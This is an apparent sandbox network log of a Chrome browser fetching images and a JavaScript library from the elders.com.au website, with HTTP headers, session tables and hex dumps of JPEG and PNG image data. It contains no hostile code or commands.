                                                                                                                                                                                                            2024-11-06 05:29:54 UTC969OUTGET /content/dam/eld/images/homepage-banners/modern_home.jpg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC715INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:56 GMT
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            Content-Length: 172833
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            Cf-Bgj: h2pri
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            content-disposition: attachment; filename="modern_home.jpg"; filename*=UTF-8''modern_home.jpg
                                                                                                                                                                                                            etag: "0x8DBB2D664B3FCD5"
                                                                                                                                                                                                            last-modified: Mon, 11 Sep 2023 14:50:08 GMT
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-served-by: cache-sjc10027-SJC
                                                                                                                                                                                                            x-timer: S1727069734.543578,VS0,VS0,VE1205
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04aac3747ae-DFW
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC654INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                                            Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: 37 34 36 34 38 38 44 31 31 45 45 41 38 33 36 38 37 41 32 45 35 39 33 32 30 43 43 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 31 30 30 35 32 66 63 64 2d 36 35 36 33 2d 34 65 30 62 2d 38 62 32 34 2d 64 65 31 63 31 32 30 30 31 63 30 38 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 31 62 38 37 33 34 33 38 2d 62 62 39 39 2d 30 32 34 61 2d 38 65 39 37 2d 39 38 37 37 37 61 38 66 62 33 36 66 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72
                                                                                                                                                                                                            Data Ascii: 746488D11EEA83687A2E59320CC" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:10052fcd-6563-4e0b-8b24-de1c12001c08" stRef:documentID="adobe:docid:photoshop:1b873438-bb99-024a-8e97-98777a8fb36f"/> </rdf:Descr
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28
                                                                                                                                                                                                            Data Ascii: Q4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 ac 69 b3 61 db 61 cb b8 dc 65 c6 81 6f 81 19 f9 b3 a7 4d 7d a8 b0 e1 43 8a d2 9f 93 2e 5c 97 d6 86 63 c6 8e ca 14 b7 1c 5a 82 50 90 49 20 0d 19 e0 33 a2 bc 95 fe ad 1f e2 4e e3 ee 0e 8f 71 e1 3f 65 57 46 33 7e 46 bc 99 36 58 fc a9 68 87 12 fe ed c6 7a 83 91 d5 1b 84 b1 d9 8c ca 81 7e 4b 6f 25 5b f2 eb b3 2a c7 58 4b 7b a0 b1 76 f2 25 c6 6f 21 db a0 b3 8c 5d ee e4 b5 a4 2b 62 1f ca 3f 91 3f 78 c3 f7 c7 3e 00 ad 43 ef 67 ba 94 da 6d ad d7 71 91 72 12 c6 9e 58 62 e7 0f bd 18 0f a4 e0 84 57 8c 9c 8b 0a e4 af 72 72 b2 9e 6c f7 49 94 5d f2 9b ed c3 25 76 e4 d6 0a e5 fe e9 7b b4 b7 79 91
                                                                                                                                                                                                            Data Ascii: (EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(iaaeoM}C.\cZPI 3Nq?eWF3~F6Xhz~Ko%[*XK{v%o!]+b??x>CgmqrXbWrrlI]%v{y
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: 1b ec f7 fd af 7f bb fe 51 ff 00 52 75 3f f5 59 e3 cf f8 1f e9 ed ff 00 3d 50 bf 59 7e 09 ff 00 8d fe 86 e3 f3 55 f3 fe 21 de cf 3f da ff 00 fb bf e5 1f f5 27 5c fd 56 f8 ef fe 03 fa 6b 7f ce d1 fa cc f0 47 fc 6f f4 37 1f 9a a3 fe 21 fe cf 3f da ff 00 ff 00 b0 1c a3 fe a4 eb bf aa bf 1e 7f c0 7f 4f 6f f9 ea 0f c4 cf 04 00 a6 f7 0f f6 37 1f 9a af 9f f1 10 f6 77 fe d7 fd 2b ff 00 d9 ff 00 28 f6 ff 00 fd 27 47 ea af c7 9f f0 1f d3 db fe 7a 91 fa cf f0 37 fc 77 f4 37 1f 9a ae 1f f1 14 f6 71 5a 7f 7c 3d 7f f8 7d ca 47 b7 ff 00 52 35 df d5 5f 8f 3f e0 3f a7 b7 fc f5 1f ac ff 00 03 7f c7 7f 43 71 f9 aa e2 7f 51 6f 66 c9 15 3c c5 41 f1 fe ef 79 4f fe 4c 1f 40 f8 55 e3 d2 50 58 63 fe de df f3 d4 7e b3 fc 0d ff 00 1d fd 0d c7 e6 ab af fe 23 7e cc ff 00 db 1f fb bc
                                                                                                                                                                                                            Data Ascii: QRu?Y=PY~U!?'\VkGo7!?Oo7w+('Gz7w7qZ|=}GR5_??CqQof<AyOL@UPXc~#~
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: 27 5c 78 ab 33 52 40 95 c7 7c 8d 8a e4 b0 72 64 2c 21 0a 5b b6 ff 00 ca 6d 37 58 57 68 4a 5a 8a 5b 71 b7 02 dc 23 fc d8 e9 55 db f8 72 ee fe f0 59 ed af 89 f2 3b dd 12 c9 1d b1 3d 1f da 1f 1b 09 ff 00 66 f7 b7 f0 aa 25 de f3 0e db 64 eb ed c1 92 88 59 ef 18 23 96 e8 0e 92 2d e3 7c 8d 1f ed 23 8c fe 0d 58 c7 ff 00 51 ef 66 51 5d 0c 49 e6 17 23 bc 52 16 1a 7b 8d f9 69 b7 0a 14 2a 95 04 af 04 07 6a 87 63 d8 eb 56 7e 0f fc 46 0d 0f 3b 77 60 85 07 bf b6 42 39 83 df 21 1d 23 0a c6 0f 8c 1f 0e 8c 86 2f d2 3f 5a dc db dc 5c a8 3c 9c 3b 95 07 a0 a1 ae af f8 93 7b 2b ad 3f be 7e bf 0f ee eb 95 ff 00 d4 5d 23 f5 45 f1 0f fc 3f fa 7b 6f cf 52 8f c5 ef 87 80 a7 e9 0c 7f d8 5c fe 66 bb 0f ea 41 ec bc 02 7f be 5e 80 54 d3 8e f9 58 d3 f7 0c 16 b5 d1 fa a3 f8 84 a9 fa 3f
                                                                                                                                                                                                            Data Ascii: '\x3R@|rd,![m7XWhJZ[q#UrY;=f%dY#-|#XQfQ]I#R{i*jcV~F;w`B9!#/?Z\<;{+?~]#E?{oR\fA^TX?
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: a0 ff 00 f7 b9 e5 9f 8d 3f fd 44 d1 fa 9f f8 8b fe 1d fd 3d b7 e7 a8 fd 70 fc 39 ff 00 11 fe ef 75 f9 9a e5 ff 00 12 5f 65 87 ff 00 7c ff 00 ee eb 95 ff 00 d4 5d 73 f5 41 f1 17 fc 3b fa 7b 5f cf 57 7f 5c 1f 0e bf c4 7f bb dd 7e 66 be ff 00 c4 93 d9 6f fb 66 ff 00 77 5c af fe a2 e8 fd 50 7c 45 ff 00 0e fe 9e d7 f3 d4 7e b8 3e 1d 7f 88 ff 00 77 ba fc cd 7d ff 00 89 1f b2 ef f6 cc 7f fb dd 72 bf fa 8b a3 f5 41 f1 17 fc 3b fb c5 af e7 a8 fd 70 7c 3a ff 00 11 fe 82 eb f3 35 c8 7e a4 3e cb c9 a0 e6 52 4f ff 00 0e f9 5f fd 45 d0 7e 10 fc 44 19 ed ff 00 de 2d 7f 3d 4a 1f 17 be 1d b8 a3 77 0c 7f f0 f7 5f 99 a3 fe 24 1e cb ff 00 db 2f ad 3f fb 3b e5 6e ff 00 0f fe 82 eb 9f aa 1f 88 88 bf a3 f0 ff 00 6f 6d f9 ea e7 eb 7f e1 da a7 e9 1c 7f f0 f7 5f 99 ae c4 fe a3 7e
                                                                                                                                                                                                            Data Ascii: ?D=p9u_e|]sA;{_W\~fofw\P|E~>w}rA;p|:5~>RO_E~D-=Jw_$/?;nom_~
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: 27 32 4b 9e ec dc ee 14 b0 98 d0 2d 18 aa ac d6 db 5c 3b 6d ba 0d d2 c4 c4 28 f0 59 8f 16 04 38 cd a6 32 1b 8b 16 23 08 42 23 25 8d 89 db 44 80 77 7c 75 9e b7 70 17 2e 63 02 31 b7 25 3c c2 b7 57 01 bf a3 fb 20 27 72 30 03 20 0d 35 5b 34 89 6d 6c 28 ef 57 27 0f 35 69 54 a1 01 f2 90 07 41 42 14 6a 4e 9e bc 79 d6 e7 f0 0f 00 75 90 69 bb 10 7b 86 34 7b c4 12 7a 96 a6 9b 70 42 b0 bb a3 29 a0 db 36 ef 35 3d d5 b9 c4 de ad ab 3f 0e b4 72 9a c6 4e e7 1b a6 bf ff 00 6e 60 ad 5c 21 6d 8b 4e 62 d9 c6 98 88 25 c7 a5 14 92 0f f7 8f 85 2d 3e 83 f1 15 8f 8e 8a 1d 52 40 07 ed 1a 97 78 7f b6 4a ef fd 9e 41 f8 86 a1 00 74 c4 39 5c c5 f9 62 b6 5d 70 71 0b cb f2 88 cb 01 4b 7f 09 8d e3 73 a9 1e 54 e4 58 ea 5c 6d ce b4 2a 52 2a 6b d7 a7 ed d7 8a b1 83 45 ab c7 ba 24 91 7a b4
                                                                                                                                                                                                            Data Ascii: '2K-\;m(Y82#B#%Dw|up.c1%<W 'r0 5[4ml(W'5iTABjNyui{4{zpB)65=?rNn`\!mNb%->R@xJAt9\b]pqKsTX\m*R*kE$z
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: 75 53 65 80 e1 58 ca 6a aa 29 09 34 1d fe 3f b4 0f 81 d7 75 ba 82 01 41 c2 ba 4b 66 84 81 d0 57 a1 ad 3a 77 3a 56 b3 c7 3a 46 8e 43 0a eb 52 7d 3e cf 4a fa 8f f9 74 e3 64 09 8e 74 87 37 85 75 10 29 fb fe de e3 bf ee d7 04 98 a1 a4 a0 44 15 d6 a1 d2 a0 fe ca 7c 7d 7f 66 96 1c 0e 1c 56 92 8e 20 11 9d 74 ab bf 7f b7 b7 71 ff 00 21 d7 55 33 a6 89 76 09 c2 83 d4 d7 a7 a7 d9 fb 3a 6b 9a 82 d2 8b 09 3a c9 e1 5c 09 1d ab f1 e8 3b fe e3 f6 eb aa b4 48 08 68 3c 6b ee e1 d4 ff 00 e0 3f fc ba 29 b8 c0 c9 d8 25 76 02 28 29 db b9 f8 ff 00 e1 d7 49 d4 94 f3 5a 08 55 c8 d6 5b 41 35 14 51 eb d7 a7 61 db b5 7d 74 d3 9e 72 e1 52 9a 07 96 b3 10 80 ae f5 34 35 eb fb 29 fb 6b a6 d6 96 2b 2d 0d 03 4a 74 ad 7b ff 00 35 47 7d 26 ba 85 52 b2 12 d2 69 e9 41 4e 9f 67 f9 4e ea eb 85
                                                                                                                                                                                                            Data Ascii: uSeXj)4?uAKfW:w:V:FCR}>Jtdt7u)D|}fV tq!U3v:k:\;Hh<k?)%v()IZU[A5Qa}trR45)k+-Jt{5G}&RiANgN
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1369INData Raw: 37 6b dd 10 99 cf 9d 46 b2 70 c0 9c 0e 84 15 34 5a 4b 83 08 b8 3b bc a5 26 ed 39 25 49 57 76 d7 75 b5 97 5a 58 3d 92 55 40 47 d9 ac 8d c9 69 bd d0 32 fb 53 4a 7c b8 d6 b2 0f f7 55 54 58 0e 3d 07 31 4d 78 a1 4e 97 fc 49 ea ef 27 e1 0d 82 41 a0 3e 4b 12 06 e4 00 7f 0d c5 f4 3a 5d cf fb c4 ab 90 b6 90 ff 00 46 4d 45 66 11 c5 cc dc c5 f9 62 b6 5e fd bd 6a c8 24 dd 9c 76 7a 64 4f b3 dc 60 c8 8b 20 33 e2 6c da f2 3b 13 61 d6 0a 12 56 97 1c 6c 00 b0 54 52 68 93 d0 d4 6b c5 63 b8 57 c7 6c 8d ee d8 0b 81 e2 75 30 e0 7d 95 eb 13 45 aa e6 42 49 c4 27 98 8f 5d 24 48 b7 3e e5 db 03 92 7b b9 74 ca 24 32 12 09 59 2c e3 f7 05 fe 1f 50 54 77 83 b8 f5 3a 97 34 ad d2 f8 d9 82 69 07 cb 85 39 14 78 46 07 15 f5 53 82 e4 d7 e3 63 0a 45 6b 6f e4 ec 62 7a 9b a8 da 6b 1a e8 c5 36
                                                                                                                                                                                                            Data Ascii: 7kFp4ZK;&9%IWvuZX=U@Gi2SJ|UTX=1MxNI'A>K:]FMEfb^j$vzdO` 3l;aVlTRhkcWlu0}EBI']$H>{t$2Y,PTw:4i9xFScEkobzk6


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            142192.168.2.457825172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC733OUTGET /content/dam/eld/icons---logos/icons/teamwork-icon.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC701INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:55 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 2373
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jan 2023 07:07:35 GMT
                                                                                                                                                                                                            ETag: "0x8DB00352B0AF601"
                                                                                                                                                                                                            Content-Disposition: attachment; filename="teamwork-icon.png"; filename*=UTF-8''teamwork-icon.png
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            Age: 3
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-dfw-kdfw8210046-DFW
                                                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                                                            X-Timer: S1709585777.027117,VS0,VS0,VE1450
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04abef46b30-DFW
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC668INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1f 08 06 00 00 00 f0 6c 7d 07 00 00 00 09 70 48 59 73 00 00 32 c0 00 00 32 c0 01 28 64 5a db 00 00 05 ca 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 31 33 37 2e 64 61 34 61 37 65 35 2c 20 32 30 32 32 2f 31 31 2f 32 37 2d 30 39 3a 33 35 3a 30 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a
                                                                                                                                                                                                            Data Ascii: PNGIHDRl}pHYs22(dZiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 54 31 37 3a 32 34 3a 35 34 2b 31 30 3a 33 30 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 33 2d 30 31 2d 32 37 54 31 37 3a 33 36 3a 34 36 2b 31 30 3a 33 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 33 2d 30 31 2d 32 37 54 31 37 3a 33 36 3a 34 36 2b 31 30 3a 33 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 39 36 35 64 63 62 65 30 2d 61 61 64 63 2d 61 33 34 65 2d 38 34 30 66 2d 38 34 63 32 31 32 36 61 65 63 34 39 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a
                                                                                                                                                                                                            Data Ascii: T17:24:54+10:30" xmp:ModifyDate="2023-01-27T17:36:46+10:30" xmp:MetadataDate="2023-01-27T17:36:46+10:30" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:965dcbe0-aadc-a34e-840f-84c2126aec49" xmpMM:DocumentID="adobe:docid:photoshop:
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC336INData Raw: f1 2e e0 74 e4 c7 30 76 78 ba 05 4a 1a a5 4f e2 6c 6d c3 fb 70 12 47 42 62 6c 49 13 f1 7a 4f 1a 7f 13 0a 29 95 af 05 0e 61 b5 aa c0 a7 3a 07 3f 87 47 e0 c0 43 81 4f b1 d0 e4 57 48 23 b3 31 4e c1 07 61 8e c3 42 18 17 6a 81 f7 a5 42 6c 52 7e 72 55 da 5f b0 58 a2 e4 db 2e 70 c9 57 31 51 17 43 4a 73 56 5d e0 bf 23 a1 02 2f e3 9f 16 db bf 4a 3e ae d2 1a 70 bd 0b bc e3 05 51 d3 ee da ee ae 96 3c 91 33 2c 79 01 5b b5 ca cd f6 36 96 7a d2 1b 28 67 b4 89 32 8c e1 5f 96 dc 13 38 19 78 ac 6a b9 8b 91 b7 71 69 34 c3 d3 3e da e3 86 61 7f d0 93 7f 21 44 d5 81 20 d6 8c 46 df eb bd 5e 1b 14 a3 fb ad 71 7b 32 27 8d 3a b9 f2 7e 49 4a e7 ed 21 f9 6c 56 b0 05 a9 47 7f c3 4a e4 a3 6a 7d bb f5 80 30 3d b9 ea c0 2a 40 51 f0 09 8e b7 6d b0 a6 e5 92 e7 ab ea 4e 90 06 a3 c6 aa 2e
                                                                                                                                                                                                            Data Ascii: .t0vxJOlmpGBblIzO)a:?GCOWH#1NaBjBlR~rU_X.pW1QCJsV]#/J>pQ<3,y[6z(g2_8xjqi4>a!D F^q{2':~IJ!lVGJj}0=*@QmN.


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            143192.168.2.457826172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC774OUTGET /etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:55 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Thu, 29 Feb 2024 03:34:08 GMT
                                                                                                                                                                                                            etag: W/"e61-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Age: 432351
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-dfw-kdfw8210114-DFW
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1709603799.636164,VS0,VS0,VE3
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04aad86485d-DFW
